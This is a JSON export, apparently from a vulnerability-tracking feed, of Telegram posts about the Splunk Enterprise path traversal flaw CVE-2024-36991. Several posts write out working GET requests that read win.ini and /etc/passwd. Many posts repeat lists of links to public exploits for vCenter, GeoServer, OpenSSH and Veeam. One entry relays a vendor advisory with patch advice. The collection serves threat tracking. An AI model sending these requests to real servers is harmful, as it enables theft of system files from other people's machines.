"https://t.me/CyberDilara/391", "content": "cve-2024-36991\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1\n\n#exploit  #poc", "creation_timestamp": "2024-07-13T13:25:46.000000Z"}, {"uuid": "29a7b43a-ed9d-4f32-8056-9bdeb6863a98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "Telegram/TJyTqjGuKoeyQsqJBRghKspB6mZD1yySHXwgvIUIoB3qUVs", "content": "", "creation_timestamp": "2025-03-31T11:00:06.000000Z"}, {"uuid": "cb472a49-fddd-4c8e-9ee9-0f7a4be468b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2152", "content": "CVE-2024-36991\n*\nSplunk  /etc/passwd\n*\nexploit", "creation_timestamp": "2024-07-06T07:49:45.000000Z"}, {"uuid": "1dc0cde4-870b-43f4-af12-c74d083231b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "Telegram/eVE5YmoRFUZV8c7TTGPUWrAfKBs48EKz-_YLWjtS9xYVJuE", "content": "", "creation_timestamp": "2025-03-30T23:00:06.000000Z"}, {"uuid": "eb51a57d-053c-42a1-a0cd-af213f5115bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8212", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T04:09:19.000000Z"}, {"uuid": "18d673d5-4773-4620-9a87-63e690120ba6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3405", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T11:05:42.000000Z"}, {"uuid": "d6cf6579-ece5-4f4d-87c9-1f9c097f2ec0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "exploited", "source": "https://t.me/true_secator/6008", "content": "SonicWall \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u043e \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Splunk Enterprise, \u0434\u043b\u044f \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043d\u0430 GitHub \u0431\u044b\u043b \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d PoC, \u0447\u0442\u043e \u043f\u043e\u0432\u044b\u0448\u0430\u0435\u0442 \u0440\u0438\u0441\u043a \u0435\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043e\u043d\u0430 \u043e\u043a\u0430\u0437\u0430\u043b\u0430\u0441\u044c \u0431\u043e\u043b\u0435\u0435 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439, \u0447\u0435\u043c \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c \u0438\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e, \u0438 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u0440\u043e\u0441\u0442\u043e\u0433\u043e \u0437\u0430\u043f\u0440\u043e\u0441\u0430 GET.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2024-36991 \u0441 \u043e\u0446\u0435\u043d\u043a\u043e\u0439 CVSS 7,5 \u0438 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u043e\u0448\u0438\u0431\u043a\u0430 \u043e\u0431\u0445\u043e\u0434\u0430 \u043f\u0443\u0442\u0438, \u0432\u043b\u0438\u044f\u044e\u0449\u0430\u044f \u043d\u0430 Splunk Enterprise \u043d\u0430 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 Windows \u0434\u043e 9.2.2, 9.1.5 \u0438 9.0.10.\u00a0Splunk \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0438\u043b\u0430 \u0435\u0435 1 \u0438\u044e\u043b\u044f.\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 \u043f\u0443\u0442\u0438 \u043d\u0430 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u0439 \u0442\u043e\u0447\u043a\u0435 /modules/messaging/, \u0435\u0441\u043b\u0438 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0435 \u0432\u043a\u043b\u044e\u0447\u0435\u043d Splunk Web.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0443\u0441\u043b\u043e\u0432\u043b\u0435\u043d\u0430 \u0442\u0435\u043c, \u0447\u0442\u043e \u0444\u0443\u043d\u043a\u0446\u0438\u044f Python\u00a0os.path.join\u00a0\u0443\u0434\u0430\u043b\u044f\u0435\u0442 \u0431\u0443\u043a\u0432\u0443 \u0434\u0438\u0441\u043a\u0430 \u0438\u0437 \u0442\u043e\u043a\u0435\u043d\u043e\u0432 \u043f\u0443\u0442\u0438, \u0435\u0441\u043b\u0438 \u0434\u0438\u0441\u043a \u0432 \u0442\u043e\u043a\u0435\u043d\u0435 \u0441\u043e\u0432\u043f\u0430\u0434\u0430\u0435\u0442 \u0441 \u0434\u0438\u0441\u043a\u043e\u043c \u0432 \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u043c \u043f\u0443\u0442\u0438.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c SonicWall, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-36991 \u0434\u043b\u044f \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0430 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u0432 \u043d\u0430 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u0439 \u0442\u043e\u0447\u043a\u0435, \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0430\u044f \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u043c \u0444\u0430\u0439\u043b\u0430\u043c \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n\n\u0421\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0433\u043e \u0437\u0430\u043f\u0440\u043e\u0441\u0430 GET \u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c\u0443 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0443 Splunk \u0441 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u043c Splunk Web \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b. \n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u0438\u043c\u0435\u0442\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0443, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043e \u0447\u0435\u0440\u0435\u0437 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u0438\u043b\u0438 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u0443\u044e \u0441\u0435\u0442\u044c.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c SonicWall, \u0432 \u0441\u0435\u0442\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e \u0431\u043e\u043b\u0435\u0435 220 000 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432, \u0447\u0430\u0441\u0442\u044c \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445, \u043f\u043e \u0432\u0441\u0435\u0439 \u0432\u0438\u0434\u0438\u043c\u043e\u0441\u0442\u0438, \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0434\u043b\u044f CVE-2024-36991.\n\n\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0441\u0442\u044c PoC \u0438 \u0437\u0430\u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043e\u0432\u0430\u043d\u043d\u043e\u0441\u0442\u044c \u043a\u0438\u0431\u0435\u0440\u043f\u043e\u0434\u043f\u043e\u043b\u044c\u044f \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445, \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043f\u043e\u0441\u043a\u043e\u0440\u0435\u0435 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u044b Splunk Enterprise \u0438\u043b\u0438 \u0436\u0435 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c Splunk Web.", "creation_timestamp": "2024-07-23T12:32:04.000000Z"}, {"uuid": "b5af17f2-28d8-478b-be24-8839fe2c4abe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6918", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T04:09:19.000000Z"}, {"uuid": "febf9935-9b5f-4c18-9d77-077df7c96a4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "Telegram/CiyO7yHlQyQc7_ZHlNUUDNT8pEDVPJtVd9vkAk_eCKafKM_GYA", "content": "", "creation_timestamp": "2024-07-20T09:00:47.000000Z"}, {"uuid": "717dc267-2257-4cd4-a22d-c9f595ae4b5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "exploited", "source": "https://t.me/haccking/11042", "content": "CVE-2024-36991\n\n#cve #exploit\n\n\u0418\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043c\u0430\u0441\u0441\u043e\u0432\u043e\u0433\u043e \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-36991: \u043e\u0431\u0445\u043e\u0434 \u043f\u0443\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u043b\u0438\u044f\u0435\u0442 \u043d\u0430 Splunk Enterprise \u0432 Windows \u0432\u0435\u0440\u0441\u0438\u0439 \u043d\u0438\u0436\u0435 9.2.2, 9.1.5 \u0438 9.0.10. \u042d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043f\u043e\u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u0444\u0430\u0439\u043b Splunk /etc/passwd.\n\n\u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442.\n\nLH | \u041d\u043e\u0432\u043e\u0441\u0442\u0438 | \u041a\u0443\u0440\u0441\u044b | \u041c\u0435\u043c\u044b\n\n#\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u044f\n#\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438", "creation_timestamp": "2024-07-14T10:35:09.000000Z"}, {"uuid": "53ca7d54-f82b-4ac7-9efb-7eb032ed711d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2763", "content": "cve-2024-36991\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1\n\n#exploit  #poc", "creation_timestamp": "2024-07-07T12:26:51.000000Z"}, {"uuid": "8ffddf39-d9fa-48ac-89ea-b0a932209867", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanInt/25267", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T11:05:50.000000Z"}, {"uuid": "7b6d234f-15c3-4b98-bf90-d8ed1d609ac6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10795", "content": "#exploit\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401", "creation_timestamp": "2024-07-08T03:16:55.000000Z"}]}